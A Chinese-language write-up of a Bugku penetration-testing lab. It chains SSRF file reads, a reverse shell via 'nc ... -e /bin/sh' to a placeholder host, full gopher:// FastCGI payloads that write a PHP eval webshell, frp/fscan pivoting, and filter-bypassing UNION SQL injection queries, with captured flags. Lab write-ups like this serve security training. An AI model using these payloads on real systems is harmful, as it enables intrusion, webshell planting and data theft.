Bugku渗透3打靶记录

3xsh0re

2026-05-24

攻防

靶机实战

入口机器存在ssrf：

直接伪协议读取passwd：www-data、nginx

发送file:///etc/hosts查看内网IP：192.168.0.2

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
192.168.0.2	8d2d6ee4843d

用BP爆破内网服务：一共有4个http站点，2，10，138，250

192.168.0.10

探测到192.168.0.10有http服务，疑似被黑

继续探测目录，看是否有后面文件：

果然有后门，能够执行系统命令，看看能不能出网：

POST / HTTP/1.1
Host: 47.116.104.238
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Origin: http://47.116.104.238
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://47.116.104.238/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7
Connection: keep-alive

url=http://192.168.0.10/shell%2ephp%3fcmd%3dping+0a34c42d10.ddns.1433.eu.org

能出网，直接反弹shell，

不知道为什么这里/bin/bash和/bin/sh一直运行不成功，查看ls /usr/bin和ls /bin才知道根本没有，不过居然有nc，无语了

1	url=http://192.168.0.10/shell%2ephp%3fcmd%3dnc%20x.x.x.x%207777%20-e%20%2Fbin%2Fsh

居然先拿下内网主机权限？

入口机器

交了之后发现漏了第一个flag，应该是在入口机器的某个目录下，其实这里我猜到了flag在根目录下，但是我还是想拿到入口机器的权限，因为作者提示这个靶机有复杂打法。

一开始想的是文件包含getshell：/index.php?a=phpinfo();，然后post请求体里面带url=http://192.168.0.10/1.txt，1.txt里面是我写好的webshell，但是不成功，我就想包含本地文件，想到是Nginx服务器，就去包含日志吧，结果看到了fastcgi。

这里我就立马想到ssrf打fastcgi，利用gopherus生成payload

1
2
3

python2 gopherus.py --exploit fastcgi
/var/www/html/index.php                 //这里输入的是一个已知存在的php文件,通过读文件确认过位置
echo PD9waHAgZXZhbCgkX1BPU1RbcGFzc10pOz8+ | base64 -d > /var/www/html/404.php

生成的是一次编码：

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH129%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%81%04%00%3C%3Fphp%20system%28%27echo%20PD9waHAgZXZhbCgkX1BPU1RbcGFzc10pOz8%2B%20%7C%20base64%20-d%20%3E%20/var/www/html/404.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

需要二次编码：

gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2503CONTENT_LENGTH129%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2581%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520PD9waHAgZXZhbCgkX1BPU1RbcGFzc10pOz8%252B%2520%257C%2520base64%2520-d%2520%253E%2520%2Fvar%2Fwww%2Fhtml%2F404.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

哥斯拉连接，成功getshell：根目录下flag{a2a685686bc6f5e7a5a9920ae21a2a20}

这里后面不知道为什么哥斯拉连不上了，换蚁剑连接，然后上frp挂代理，以及fscan扫内网

192.168.0.138:80

应该是sql注入：

测试一下union、空格被拦截了，

-1/**/uNion/**/select/**/1,version(),database(),4#
-1/**/uNion/**/select/**/1,2,group_concat(schema_name),4/**/from/**/information_schema.schemata#
-1/**/uNion/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema='bugku_sql'#
-1/**/uNion/**/select/**/1,2,group_concat(column_name),4/**/from/**/information_schema.columns/**/where/**/table_name='flag'#
-1/**/uNion/**/select/**/1,group_concat(flag,':',flag),3,4/**/from/**/bugku_sql.flag#

结果如下：

5.7.29,bugku_sql
information_schema,bugku_sql,mysql,performance_schema,sys
double,flag,userinfo
flag
flag{f9f492ce2cf4dd61c0241c58957b0622}:flag{f9f492ce2cf4dd61c0241c58957b0622}

居然是flag4，那flag3应该还在.10那台机器上，正好fscan扫到了这台机器也有fast-cgi，直接gopher打：

url=gopher%3A%2F%2F192.168.0.10%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2503CONTENT_LENGTH129%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2517SCRIPT_FILENAME%2Fvar%2Fwww%2Fhtml%2Findex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2581%2504%2500%253C%253Fphp%2520system%2528%2527echo%2520PD9waHAgZXZhbCgkX1BPU1RbcGFzc10pOz8%252B%2520%257C%2520base64%2520-d%2520%253E%2520%2Fvar%2Fwww%2Fhtml%2F404.php%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

虽然之前拿到反弹shell，还是webshell方便一点，果然pass=system('ls /');下面还有一个flag3：flag{d30ecbe699986d90c1d01d645a2fb924}